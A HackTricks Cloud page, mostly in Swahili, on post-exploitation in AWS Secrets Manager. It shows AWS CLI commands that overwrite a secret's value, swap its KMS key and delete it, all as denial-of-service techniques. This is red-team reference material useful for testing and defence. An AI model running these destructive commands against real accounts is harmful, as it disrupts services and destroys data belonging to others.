AWS - Secrets Manager Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Secrets Manager

Kwa maelezo zaidi angalia:

AWS - Secrets Manager Enum

Read Secrets

siri zenyewe ni taarifa nyeti, angalia ukurasa wa privesc kujifunza jinsi ya kuzisoma.

DoS Change Secret Value

Kubadilisha thamani ya siri unaweza DoS mfumo wote unaotegemea thamani hiyo.

Kumbuka kwamba thamani za awali pia zimehifadhiwa, hivyo ni rahisi kurudi kwenye thamani ya awali.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS Badilisha funguo la KMS

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Kuondoa Siri

Idadi ya chini ya siku za kuondoa siri ni 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7

Support HackTricks

Check the mpango ya usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousAWS - S3 Post Exploitation NextAWS - SES Post Exploitation

Last updated 8 days ago